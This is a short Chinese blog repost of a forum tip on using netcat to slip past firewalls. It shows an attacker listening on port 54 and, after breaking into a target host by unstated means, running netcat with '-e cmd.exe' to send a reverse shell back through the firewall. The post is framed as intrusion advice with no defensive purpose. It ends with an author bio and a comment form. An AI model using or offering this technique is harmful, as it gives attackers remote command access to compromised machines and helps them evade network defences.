提交者郵件地址: [email protected]
提交者QQ號碼: 13865333
標題: nc妙用,反向連接穿越防火強 (作者:greenice www.ls3389.com )
內容:
nc妙用,反向連接穿越防火強 (作者:greenice www.ls3389.com )
被稱為瑞士軍刀的NC其實有很多妙用,網上有很多使用說明,但都講得很淺。
現在講其中的一個妙用:
很多防火強都限定了端口,不給正向連接。但是由裡向外反向連接是可以的!!
先在本機用
nc -l -p 54
開一個端口!
進入目標主機後(怎麼進那是你的問題了,比如U)在目標主機中用
nc 你的本機IP 54 >> nc -e cmd.exe
這時nc就會反向發一個shell給你,防火強就會為你轉發數據

By tony

自由軟體愛好者~喜歡不斷的思考各種問題,有新的事物都會想去學習嘗試 做實驗並熱衷研究 沒有所謂頂天的技術 只有謙虛及不斷的學習 精進專業,本站主要以分享系統及網路相關知識、資源而建立。 Github http://stnet253.github.io

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料